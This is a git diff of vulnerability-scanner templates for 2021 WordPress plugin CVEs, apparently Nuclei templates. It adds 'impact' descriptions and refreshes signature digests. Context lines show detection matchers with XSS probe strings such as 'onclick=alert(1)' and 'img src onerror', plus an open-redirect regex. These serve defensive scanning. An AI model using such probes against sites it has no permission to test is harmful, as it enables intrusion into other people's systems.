index cce94e91e2..55b6cce7b8 100644
--- a/http/cves/2021/CVE-2021-24838.yaml
+++ b/http/cves/2021/CVE-2021-24838.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the execution of other malicious activities.
   remediation: |
     Update to the latest version of WordPress AnyComment plugin (0.3.5 or higher) to fix the open redirect vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4a0a00473045022035807be7782d6762e41695a79755ebd861154a175783dd3c9578782939b7a3de022100929e249f4cd612eafc9fb48234268e3429f5eeff46a19e5e567a89953fa1e372:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008e66db02ed87852f24a8112e9b1e95a61fa4b6fcda491ac33bcf75720bf50d8202200c6fb45f3e11457340195f6ed8ae2c63d5932f617a07bf822aca9526861ddf95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml
index da0ee26416..d02993a605 100644
--- a/http/cves/2021/CVE-2021-24862.yaml
+++ b/http/cves/2021/CVE-2021-24862.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress RegistrationMagic plugin before 5.0.1.6 contains an authenticated SQL injection vulnerability. The plugin does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This is a potential issue in both WordPress and WordPress Administrator.
+  impact: |
+    An authenticated attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version 5.0.1.6.
   reference:
     - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615
@@ -51,4 +53,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_3, "rm_user_role_mananger_form")'
         condition: and
-# digest: 4a0a0047304502205d9ba8844379da966a491c10842256c93a30a957cc5678fa5c4f924003c88d7a0221009f6e96a6dde87175c5b96226bcbef0eeb0f3359ab06ae3eac0255db19d1208a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100acfbdaf61ca0db640a2ac478c88b2f8c2fba13cc13feb073c7d1340fc6ecad45022100977f1949b24a5abfcbce5b79079f60b74058d3fd68633af17dc264df70d6d0c8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml
index e4265207b6..d92154b4ed 100644
--- a/http/cves/2021/CVE-2021-24875.yaml
+++ b/http/cves/2021/CVE-2021-24875.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress eCommerce Product Catalog plugin before 3.0.39 contains a cross-site scripting vulnerability. The plugin does not escape the ic-settings-search parameter before outputting it back in the page in an attribute. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 3.0.39.
   reference:
     - https://wpscan.com/vulnerability/652efc4a-f931-4668-ae74-a58b288a5715
@@ -45,4 +47,4 @@ http:
           - 'contains(body_2, "alert(document.domain)")'
           - 'contains(body_2, "eCommerce Product Catalog")'
         condition: and
-# digest: 4a0a00473045022100cd04081ed23a746d6168c154fec7cfb281ef2d8b030fd240f67c80808269375d022059341efdd165b5c7b5a91c0d26470f70c4a74a550c77e94637baa3660942f066:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022065f95dea663dbcf6e58715e783a7e2b5953569989a57bfd09e1b3775c4ddc36b02204926401d452e7f8fcaa1323f57d18febb1b48f8c266ac2760e21196d70ea50c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml
index 9c12ee440a..750476f0e2 100644
--- a/http/cves/2021/CVE-2021-24891.yaml
+++ b/http/cves/2021/CVE-2021-24891.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Elementor Website Builder plugin before 3.1.4 contains a DOM cross-site scripting vulnerability. It does not sanitize or escape user input appended to the DOM via a malicious hash.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update WordPress Elementor Website Builder to version 3.1.4 or later to mitigate this vulnerability.
   reference:
@@ -55,4 +57,4 @@ http:
       - type: kval
         kval:
           - version
-# digest: 4b0a00483046022100d110bb3392364fe9c4fc3c81eef3f3e881061613ce1356e61e7a6b1f6c80c1d0022100a7246c4858c2005824cae01cc591c9d4948756b37dcd970334ffd865f8e28921:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b215ad42edb22f1a63157e141609b5bbcc107fe95382f96ffc3b8eceb2490786022100ac980397868b513f7c7672e411855acbe0aa19c8abbb9e4e1879068155347ea9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24910.yaml b/http/cves/2021/CVE-2021-24910.yaml
index 7a064749ec..ede5481dd6 100644
--- a/http/cves/2021/CVE-2021-24910.yaml
+++ b/http/cves/2021/CVE-2021-24910.yaml
@@ -5,6 +5,8 @@ info:
   author: Screamy
   severity: medium
   description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100aba40ab29d55b3cddbb4067f19bc0489b1c67da6cfe05d10dc5d11491f3507c1022061ada059bc1b3517355f2e1af5918002aafed2d1b5630bc782826d484341e4dc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205928680dfe6950f92131c27c1eb9f36eef45502572d00fab3499b16b0331cad0022074ebc01a09eb2036174b419cbbb73ec574e82e17f31ddb58d16071c7157459f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml
index acc6d3d0d2..be004810f3 100644
--- a/http/cves/2021/CVE-2021-24917.yaml
+++ b/http/cves/2021/CVE-2021-24917.yaml
@@ -5,6 +5,8 @@ info:
   author: akincibor
   severity: high
   description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
+  impact: |
+    An attacker can gain sensitive information about the WordPress site, such as the login page URL.
   remediation: Fixed in version 1.9.1.
   reference:
     - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
@@ -48,4 +50,4 @@ http:
       - type: kval
         kval:
           - location
-# digest: 4a0a0047304502207aaa7386ff271861637cb2580c2095d46c12a60a78348659fdbc8010ea7b589802210092eaa81d5805a873c76b0c8d4e4f5d2771da0236ec474aa2ca03ac3382f0e51f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205b69086983837e87d9cfb438934d4d94181a6be2430d231e852efd58895b764f0221008da5274e4b7f917e20a6f79117444c27ff85f590eb95d3e5ab96d9621adebf84:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml
index b3e70d79a0..3b570b3b9c 100644
--- a/http/cves/2021/CVE-2021-24931.yaml
+++ b/http/cves/2021/CVE-2021-24931.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
   remediation: Fixed in version 2.8.2.
   reference:
     - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231
@@ -43,4 +45,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "{\"status\":true")'
         condition: and
-# digest: 4b0a00483046022100dfee2a0fe94c074c7840e5762d7c5ec22946743ab73dc183537ac4d24d2bce19022100d0ed0c1f4e14189635729a07497aed1d93e08fdbe8ee4217628c47bfe8d01f6c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a3b7c6e27282b1603d02d9b2799d5df70ffc7c9e9554dcf0ced3f6d5ee93fc8a022100c1d9cdc11c0d883ba7019014bbca5d4794e0d772856550f164f0c32b117798c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml
index 27c692a76e..66f7cb7651 100644
--- a/http/cves/2021/CVE-2021-24940.yaml
+++ b/http/cves/2021/CVE-2021-24940.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in 5.9.8.
   reference:
     - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
@@ -46,4 +48,4 @@ http:
           - contains(body_2, 'accesskey=X onclick=alert(1) test=')
           - contains(body_2, 'woocommerce_persian_translate')
         condition: and
-# digest: 4a0a00473045022100b74bfe5faee66974c259060630fed6323b9374536f01c399a7b2dab17a057b0f02206b5b81c8175d22c5cf2d4dac6ff5a53e3c74fedb5503b6b0ed1075b15ef65615:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210081aaeb7a07d0a81a0465d41be5b3d6063cad9dac9e7ca44942a947c007eb6f1a0221008205411f3d9301cc22030dfb0fa90ea83f1b33edabdbf3f4aa31224b8e199099:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml
index 20048486fe..c87a67a065 100644
--- a/http/cves/2021/CVE-2021-24946.yaml
+++ b/http/cves/2021/CVE-2021-24946.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
   remediation: |
     Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(content_type, "text/html")'
           - 'contains(body, "The event is finished") || contains(body, "been a critical error")'
         condition: and
-# digest: 4a0a00473045022100e76d03c28c73a0e65a4e4f33aa60fbbbb3b10dca09d16327239d5986666fbc00022032152b0b227821065e3bfcddc9e213d843c4276baa251d65e8057824797e8e9d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220127df7b41210f9ba6e8ca914f1f257ac47c717d75131bd3aeb69d51873bf2d4a02207ba53380aa03a5976bed793c5fdf19f198fb6e379383aa57532922832b5630d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml
index 9b8f36f0dd..eaf1e02866 100644
--- a/http/cves/2021/CVE-2021-24947.yaml
+++ b/http/cves/2021/CVE-2021-24947.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.
   remediation: |
     Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022018f4b7e2aab2a72b189d2df843c53c0259910c6d5e55c5559dbcf674fae9117602200f888db5ba1e6a2c96a54dd92cc52f10a28d307c81651fb235455d4aab04f250:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d6ff7ba2539b0e4750a9c84915564d4ef34f2465fb79cb6c948ef665b47109dc02202636d80e847fe66c905316af1dd43cdbe6a9a466cfdb0dcb1b7c1270056c4607:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml
index 8c52cd3ff5..c2836e0a9a 100644
--- a/http/cves/2021/CVE-2021-24956.yaml
+++ b/http/cves/2021/CVE-2021-24956.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 6.8.7
   reference:
     - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2
@@ -55,4 +57,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202399ac108b6bf744268a08b63d32e9eef1d4722bc42d8da00c267bcf5bdfd307022061c95a516993bfd5ec19f322453cff75911f095b41e2f5e39de27636e7139619:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ecfea72b848af2e629f880f21fa8563a0e96a0e61a543f38fc8b184767cd28ed022073ca2653dc7812ebe3c517cde89b820161631d72607f867d62bc932ac044484d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml
index 020036844d..d85c27eb15 100644
--- a/http/cves/2021/CVE-2021-24970.yaml
+++ b/http/cves/2021/CVE-2021-24970.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: Fixed in version 2.5.4.
   reference:
     - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10
@@ -48,4 +50,4 @@ http:
           - 'contains(body_2, "Hello world!")'
           - 'contains(body_2, "Welcome to WordPress")'
         condition: and
-# digest: 4b0a00483046022100b4720ca88ce79c4fbb5ba61e6e678206d4b48a354c308e14a748f8154ab6d0e8022100d288c9c19b08922d6753dc6b5a9ed4f9c33bc7910325a6a49d257a68c4353190:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fdbbd6ed6d166490cff539a23e9e825a1df3b1d155ae5dae6cf79061b73222f40220454c966fc0cb33c62560c8128f7c71d25ea8e001600873a35023a30a3709f67e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml
index 7aa65a3605..1e9e388a54 100644
--- a/http/cves/2021/CVE-2021-24987.yaml
+++ b/http/cves/2021/CVE-2021-24987.yaml
@@ -5,6 +5,8 @@ info:
   author: Akincibor
   severity: medium
   description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the WordPress Super Socializer plugin (7.13.30 or higher) to mitigate the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e0d17715ffc83215f28593a2dccd2ae41420ed434f0dcf16c4cce2d4f3637cb3022100b8d848b7fa2a7204d25c921d835c2392fd05ac35143d8d692d207723fa8cfb3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204c192d268b623f466196ef189721bad45293bf9a99841e6db946e8e379849cdc022100d3d4c1414addcd30bd8669025249c0a5b66d050ea9a44c62a2325cead7853684:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24991.yaml b/http/cves/2021/CVE-2021-24991.yaml
index a2bd681078..84df5ba978 100644
--- a/http/cves/2021/CVE-2021-24991.yaml
+++ b/http/cves/2021/CVE-2021-24991.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: The Wordpress plugin WooCommerce PDF Invoices & Packing Slips before 2.10.5 does not escape the tab and section parameters before reflecting it an attribute, leading to a reflected cross-site scripting in the admin dashboard.
+  impact: |
+    An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of the WooCommerce PDF Invoices & Packing Slips WordPress Plugin (2.10.5 or higher) to mitigate the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022015b4603470fef4550b3722bb31e572a29e6889696d8af7ad9ada611f4b9400d802207f7159186248e3ad1e94449e97cbd8b3ce437c07d26d0195e169d1ac63f6561e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210092ace8885a4e5523aa66241156172d78b33add4dc7d0f60b8ec87e7f6be9a41f022100963351b709074ddb1f3b8917538ee91e443c180a090852ee4efe2006bdd28f5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml
index b46427bd44..d4e1a1739e 100644
--- a/http/cves/2021/CVE-2021-24997.yaml
+++ b/http/cves/2021/CVE-2021-24997.yaml
@@ -5,6 +5,8 @@ info:
   author: Evan Rubinstein
   severity: medium
   description: WordPress Guppy plugin through 1.1 is susceptible to an API disclosure vulnerability. This can allow an attacker to obtain all user IDs and then use them to make API requests to get messages sent between users and/or send messages posing as one user to another.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: |
     Update to the latest version of the WordPress Guppy plugin (version >1.1) to mitigate the information disclosure vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203e3d0cd362f45e13ce0efc54c4dc3c2be8413c6d5b9773b88af2df7f9a75b7e8022070c1bffa9528d41f38432640feb3a840743ece7382dc0d2b38ef939d26f9087b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205d965222ab4a64fdfd18a34c695dcdb71886d27e4bb719fd591171841184815a022100ad570d82ce112d88274a0a10bf23ff21db1262a0e0dfb52f06feb139c3e8a21b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml
index c0c6204137..015d98bbed 100644
--- a/http/cves/2021/CVE-2021-25003.yaml
+++ b/http/cves/2021/CVE-2021-25003.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
   remediation: |
     Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - contains(body_3, md5(num))
           - contains(body_3, 'PNG')
         condition: and
-# digest: 490a0046304402207d1e6f6fbd5d148b1cf7d363cf1cba38438c56c5625f06cf9b0e5571e1ff72ff02205cf782cfe7257bad995417ec2a665d7351fd81ad393ae03ebc940cdafcbfde4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220466b4beb9fb7f9d36d2b04cc7761689a0b2d8f23fc70468fdf831d337910e901022052803e000cc4bb6a3c89bdf9889374df30886f3d0d0447849f13c70fab799c48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml
index 98bf1b748c..67b1c02405 100644
--- a/http/cves/2021/CVE-2021-25008.yaml
+++ b/http/cves/2021/CVE-2021-25008.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: medium
   description: The Wordpress plugin Code Snippets before 2.14.3 does not escape the snippets-safe-mode parameter before reflecting it in attributes, leading to a reflected cross-site scripting issue.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the Code Snippets WordPress Plugin to version 2.14.3 or later to mitigate the vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220053b4f37e1b7c35c1b2dd10c1d5dda8d2c4b50015b43a827cd077a7dbe0bd63a022100cbcc4a993ffc8d0dc59dd5461ed5bcfd12d299d15fff2a6914c985f77df138fd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f8b2a67034bcd7918a6ff12a8fc2d1170f9339af89c251f7b031d50d617505e202200bedbe81a0aebfcba89bfbe119e9ab06de6476c64042ee668e59fe129ed7c5b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml
index 8a9b687af0..f497ba8925 100644
--- a/http/cves/2021/CVE-2021-25033.yaml
+++ b/http/cves/2021/CVE-2021-25033.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue.
+  impact: |
+    An attacker can trick users into visiting malicious websites, leading to phishing attacks.
   remediation: |
     Update to Noptin plugin version 1.6.5 or later.
   reference:
@@ -36,4 +38,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402206af871548224c9cdf72f4ad99e3405a24816481994f26221001d489ae67f795402204aa4b60c7420b53ead20fb07b3c8d7b64d2e64cf6f2e74b0ae7cf96bd3fc4c64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c9a6e2d339c82d5fb38a0545788a73b7273c96e9f2376bad4ecdfec02940369b022066040b26e5e2246dd643e3f72d18f005a1ea76b232c20f95feb07e3f7cd98f7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml
index 34232c1df5..be187b10fd 100644
--- a/http/cves/2021/CVE-2021-25052.yaml
+++ b/http/cves/2021/CVE-2021-25052.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong
   severity: high
   description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
+  impact: |
+    An attacker can exploit this vulnerability to execute arbitrary code on the target system.
   remediation: |
     Update to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450220785ccbced188c45cb68cda9b9cde20bf1f43b5e836c15a8d61729d8fe402767d022100e41629d68f2d9eefb1ec3e035e6ee122b26c8b91a231382756a032a330ac61a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022048f435a1baaa0f78b9a56113c0c388c53223f09800effca2f10142f8153eeda5022100871a01eab2be328be92ecd790f5d22312392afa58340834a222f12fe1a32d2d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml
index 82bdf0c38c..5280b99151 100644
--- a/http/cves/2021/CVE-2021-25055.yaml
+++ b/http/cves/2021/CVE-2021-25055.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected WordPress website.
   remediation: |
     Update to the latest version of the FeedWordPress plugin (version 2022.0123 or higher) to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c4ddf30f052c1eecf4c08605daf649615256b8a2a032ee1656e6c3603d25d8da022066974b8ee6f2c294801878777164f13acdf2b7149d513e814b2fb75925780ec1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008520ef75c1c1af11128d09c8d8219a1d40a575766b86283f40b8ba33f8bef70c022071a20e552e366a648847d8af7d18e3fc00f564a47f0daee85dcc4f409e898c0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml
index 168f0e1531..a7d80c35e4 100644
--- a/http/cves/2021/CVE-2021-25063.yaml
+++ b/http/cves/2021/CVE-2021-25063.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement.
   remediation: |
     Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203627d2da0e509f4d113d228230e6c6e4f74fe6ae3ddad999ccd9a37714a07011022100ab9319551f3ac704dbe32f47da9ead4bcd6f3d8e51017b9061db3c477447b728:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220395e74d014698d0a1575119f94fa46c720b094af739dc0da32c6cf5ababe5dcc022100d597403293d8eaed7928380347302e72a0ae3a07c8912b52668bb19f0c2dca47:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml
index 65b6e4469d..023ba7922c 100644
--- a/http/cves/2021/CVE-2021-25065.yaml
+++ b/http/cves/2021/CVE-2021-25065.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page.
+  impact: |
+    An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 2.19.2
   reference:
     - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc
@@ -46,4 +48,4 @@ http:
           - 'contains(body_2, "<img src onerror=alert(document.domain)>")'
           - 'contains(body_2, "custom-facebook-feed")'
         condition: and
-# digest: 4b0a00483046022100980aa4fa2912055926b56a4ff8a1513062fde6e166079c4991eb0ffde50238d6022100e21b474ff60583567e92071af89e40d0c0a4c5cccd627e9c7a1808ffe54d316c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
